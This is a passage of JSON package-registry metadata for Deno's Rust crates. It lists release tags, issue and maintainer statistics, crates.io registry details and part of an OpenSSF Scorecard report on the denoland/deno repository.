/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:18:33.978Z","dependent_packages_count":4,"downloads":438944,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":7.6274891089705905,"dependent_repos_count":16.666163825614724,"dependent_packages_count":7.416206594865297,"stargazers_count":0.0022611133722244834,"forks_count":0.05803524322042841,"docker_downloads_count":6.750482392667631,"average":6.42010637978515},"purl":"pkg:cargo/deno_napi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_napi","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_napi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_napi/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T07:01:34.073Z","updated_at":"2022-11-08T07:01:34.073Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.609Z","updated_at":"2023-07-18T22:41:28.609Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4198030,"name":"node_resolver","ecosystem":"cargo","description":"Node.js module resolution algorithm used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":97,"first_release_published_at":"2022-02-24T04:50:07.013Z","latest_release_published_at":"2026-08-27T15:19:32.411Z","latest_release_number":"0.96.0","last_synced_at":"2026-09-07T22:57:06.666Z","created_at":"2022-04-12T20:23:23.291Z","updated_at":"2026-09-07T22:57:06.666Z","registry_url":"https://crates.io/crates/node_resolver/","install_command":"cargo install node_resolver","documentation_url":"https://docs.rs/node_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 